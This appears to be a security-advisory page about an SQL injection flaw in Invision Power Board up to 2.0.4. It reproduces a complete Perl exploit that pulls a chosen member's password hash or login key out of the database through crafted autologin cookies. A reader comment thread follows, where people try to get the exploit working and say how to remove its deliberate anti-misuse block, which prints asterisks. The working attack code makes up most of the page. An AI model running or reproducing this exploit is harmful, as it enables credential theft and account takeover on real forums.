|
|
| |
Invision Power Board (IPB) is "a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world".
An SQL injection vulnerability was found in Invision Power Board allows attackers to add, change, delete and view records from the database. |
| |
Credit:
The information has been provided by RusH.
|
| |
Vulnerable Systems:
* Invision Power Board 2.0.4 and prior
Exploit:
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75" . "%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0" . "%E0%F1%21%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, $pass_hash3, $nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
|
| Subject:
|
problem |
Date: |
4 May 2006 |
| From: |
snipersnaketop.com |
the hash apear as ******************
how can it apear as valid md5 hash |
|
| Subject:
|
version |
Date: |
14 Jun. 2006 |
| From: |
Mr E |
| it only works in versions 2.0.4 and below check the versions. |
|
| Subject:
|
Question |
Date: |
24 Jun. 2006 |
| From: |
Dragon Hellfire |
| what do you suggest I use to get the proper hash? |
|
| Subject:
|
How |
Date: |
27 Jun. 2006 |
| From: |
Justin |
| How are you suppose to use exploits? |
|
| Subject:
|
How |
Date: |
1 Jul. 2006 |
| From: |
Dude |
| How can I put that code up there to use? |
|
| Subject:
|
nt |
Date: |
11 Jul. 2006 |
| From: |
TheNymf |
you must open it with a PERL shell (read about it)
the script is easy - it will tell you what to do
the problem is: it does indeed say *********** as hash.
even with version 2.0.0 ...! so this version of the exploit doesn't seem to work
Greetz
|
|
| Subject:
|
How |
Date: |
14 Jul. 2006 |
| From: |
Sonic |
| Im curious as to how to fix the issue or where i can find info on how to fix the issue. Besides upgrading ipb. |
|
| Subject:
|
help |
Date: |
2 Aug. 2006 |
| From: |
rawr |
| ok it keeps saying failed. can someone plz explain what each of the values are (target and member_id) |
|
| Subject:
|
rawr |
Date: |
2 Aug. 2006 |
| From: |
rawr |
| nvm it keeps saying failed... prolly patched :( |
|
| Subject:
|
How |
Date: |
10 Aug. 2006 |
| From: |
Pr0jectX |
| the script has a script kiddie block. Find it remove it and your done. Learn perl |
|
| Subject:
|
Re: How {Pr0jectX} |
Date: |
16 Feb. 2007 |
| From: |
TwztdJustiz |
| I get the block, in chr(42), ASCII for *, I screw around with Visual Basic all day at work, so I knew that one!... But i've tried everything, even ranging the chr set from chr(0) to chr(127), which is obviously more than I need, but I still can get the hash to pull anything but *s or 0s. |
|
| Subject:
|
hash |
Date: |
3 Jul. 2007 |
| From: |
electron |
my problem is the same
the hash is ***************************** |
|
| Subject:
|
... |
Date: |
21 Nov. 2007 |
| From: |
Psycho |
With the skiddie block ON .. Does it still say if it fails?
Because it either says it fails, or if I turn it on it gives me stars. -_- |
|
| Subject:
|
yea ... this is a hard one :D Im 16 and it tooked me like 2 hours to figure it out : |
Date: |
6 Jul. 2008 |
| From: |
XMi XmiX2 XMimxGmail.sex |
| the answer is $i |
|
|
|
|
